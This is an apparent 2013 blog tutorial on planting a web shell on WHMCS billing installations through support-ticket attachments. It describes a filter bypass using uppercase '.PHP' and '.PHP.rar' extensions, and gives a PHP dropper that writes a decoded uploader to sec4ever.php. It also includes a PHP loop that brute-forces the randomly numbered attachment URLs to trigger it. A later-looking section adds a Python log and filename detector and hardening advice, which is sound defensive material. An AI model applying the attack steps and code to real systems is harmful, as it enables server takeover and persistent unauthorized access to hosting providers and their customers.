Sunday, 14 April 2013

WHMCS Shell Uploading Tutorial





Credits: sec4ever, MadLeets and all Pakistani Haxors




This tutorial is about uploading a shell to WHMCS via attachments.

First, let's talk about MIME types.

These are extensions:


Code:
gif,png,rar,zip,php,asp,aspx

Apache uses the file extension to decide how to handle a file.

For example, if you upload a file as b0x.gif

Apache will serve it as a picture/image.

And if you upload it as b0x.php

the file will be run as a PHP file.

Okay... In Apache there are many extensions that are not defined, like rar.

So let's start. In WHMCS, go to submit a new ticket:

Code:
http://site.tld/whmcs/submitticket.php

You'll see this:

[Image: WOR61514.png]
For the attachments we have two possibilities.

I: The PHP extension is allowed to be uploaded

But when we try to upload a PHP file we get this result:

[Image: AKQ64896.png]

To bypass this problem, you just have to change the extension from lowercase php to uppercase PHP, like this:

Code:
b0x.PHP

The extension is changed with Tamper Data:

[Image: oDZ62191.png]

Then submit it.

[Image: wh162273.png]

Our ticket is ready now, so we have uploaded PHP.

This was our first possibility.

II: The PHP extension is not allowed to be uploaded on WHMCS

So we'll use an extension that is not defined in Apache,

like "rar". We'll use Tamper Data here too.

[Image: tSi62460.png]

We'll upload it as "b0x.PHP.rar"

Don't forget the capital letters.

Then we'll get this:

[Image: hlj62514.png]

File uploaded successfully.

But in WHMCS, when you attach or upload a file,

the file is automatically renamed like this:

Code:
number_filename.extension

For example, our file b0x.PHP will become:

Code:
RandomNumber_b0x.PHP

We won't be able to know the number because WHMCS uses a random number, so we have to try numbers.

Before that, let's make a small summary.

This code must be the attached file:

PHP Code:
<?php
// Base64-encoded uploader script (encoded payload removed here)
$shellcode = "...";
// Decode the payload and write it to sec4ever.php in the current folder
$b0x = fopen("sec4ever.php", "w");
fwrite($b0x, base64_decode($shellcode));
?>

This is an uploader script that will be created in the same folder - attachments -
Now upload it as before, via .PHP or a non-defined extension.

After that, use this code to generate and browse the site URLs and get the uploader in sec4ever.php

PHP Code:
<?
error_reporting
(0);  $url "http://domain.tld/whmcs/";  $attachfolder "attachments";  $attach"b0x.PHP";
for(
$b0x=100000$b0x<1000000;$b0x++){  $urls "$url/$attachfolder/$b0x"$urls.="_$attach";  $ch = @curl_init();
@
curl_setopt($chCURLOPT_RETURNTRANSFER1);
@
curl_setopt($chCURLOPT_URL$urls );  $result = @curl_exec($ch);
@
curl_close($ch);
}  
?>
Edit the variables to get the correct result - 3xPecteD

Then, when the script has finished browsing the URLs auto-generated by the for loop,

the script will have browsed your PHP code, but you won't be able to know what the number is!

But the script will generate the shell/uploader in sec4ever.php

[Image: q8O63187.png]
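
For defenders, this technique leaves two signs: an attachment whose name carries a script extension in any position or letter case, and one client requesting the same attachment name under many different numeric prefixes. The Python below is an added example, not part of the original tutorial; the extension set, the threshold, the access-log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumption: extensions this server maps to a script handler; align the set
# with the AddHandler/AddType/SetHandler lines of the real configuration.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "asp", "aspx"}

# Stored attachment name as described on the page: <number>_<original filename>
STORED = re.compile(r"/attachments/(\d+)_([^/?\s]+)")
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) ')

# Constructed sample access-log lines (not taken from a real server)
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Apr/2013:10:00:01 +0000] "GET /whmcs/attachments/100000_b0x.PHP HTTP/1.1" 404 210',
    '198.51.100.7 - - [14/Apr/2013:10:00:01 +0000] "GET /whmcs/attachments/100001_b0x.PHP HTTP/1.1" 404 210',
    '198.51.100.7 - - [14/Apr/2013:10:00:02 +0000] "GET /whmcs/attachments/100002_b0x.PHP HTTP/1.1" 404 210',
    '203.0.113.9 - - [14/Apr/2013:10:00:05 +0000] "GET /whmcs/attachments/482913_invoice.pdf HTTP/1.1" 200 5120',
]


def risky_attachment(name):
    """True if any dot-separated part after the base name is a script
    extension, compared case-insensitively (b0x.PHP, b0x.PHP.rar)."""
    parts = name.lower().split(".")[1:]
    return any(p in SCRIPT_EXTS for p in parts)


def enumeration_sources(log_lines, threshold=3):
    """Return {(client, name): distinct_prefixes} for clients that requested
    the same attachment name under at least `threshold` numeric prefixes."""
    seen = defaultdict(set)
    for line in log_lines:
        req = REQUEST.match(line)
        if not req:
            continue
        hit = STORED.search(req.group(2))
        if hit:
            seen[(req.group(1), hit.group(2))].add(hit.group(1))
    return {k: len(v) for k, v in seen.items() if len(v) >= threshold}


if __name__ == "__main__":
    for name in ("b0x.PHP", "b0x.PHP.rar", "b0x.gif"):
        print(name, "risky" if risky_attachment(name) else "ok")
    print(enumeration_sources(SAMPLE_LOG))
```

The same filename test belongs in the upload handler itself, and the attachments folder should be stored where the web server will not execute scripts from it.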

